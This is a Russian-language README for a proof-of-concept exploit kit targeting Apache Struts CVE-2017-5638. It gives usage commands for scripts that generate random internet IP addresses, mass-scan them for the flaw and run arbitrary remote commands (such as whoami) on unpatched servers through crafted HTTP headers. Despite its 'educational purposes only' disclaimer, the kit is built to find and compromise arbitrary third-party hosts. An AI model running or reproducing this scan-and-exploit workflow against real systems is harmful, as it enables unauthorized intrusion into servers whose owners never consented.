
Эксплойт для проверки концепции уязвимости Apache Struts CVE-2017-5638. Генерирует случайные IP-адреса, сканирует уязвимые хосты и выполняет удаленные команды с помощью специально сформированных HTTP-заголовков.
Этот проект является доказательством концепции для уязвимости Apache Struts. Цель состояла в создании программного обеспечения, которое может генерировать и проверять случайные IP-адреса на наличие описанной выше уязвимости.
Используйте этот проект на свой страх и риск и только в образовательных целях.
cURL
Nmap
Создание случайных IP-адресов и сохранение их в текстовый файл.
./get_ip.sh [Количество хостов для сканирования] [Какой порт сканировать] [Имя файла для записи вывода]
./get_ip.sh 10000 80 output.txt
Проверка уязвимости для конкретного IP-адреса.
./struts_check.sh [ip адрес] [порт]
./struts_check.sh 127.0.0.1 80
Проверка уязвимости для списка IP-адресов.
./main.sh [Текстовый файл с IP-адресами] [Порт]
./main.sh output.txt 443
Выполнение команды на сервере без патча уязвимости Apache Struts
./struts_attack.sh [IP адрес] [Команда]
./struts_attack.sh https://127.0.0.1 whoami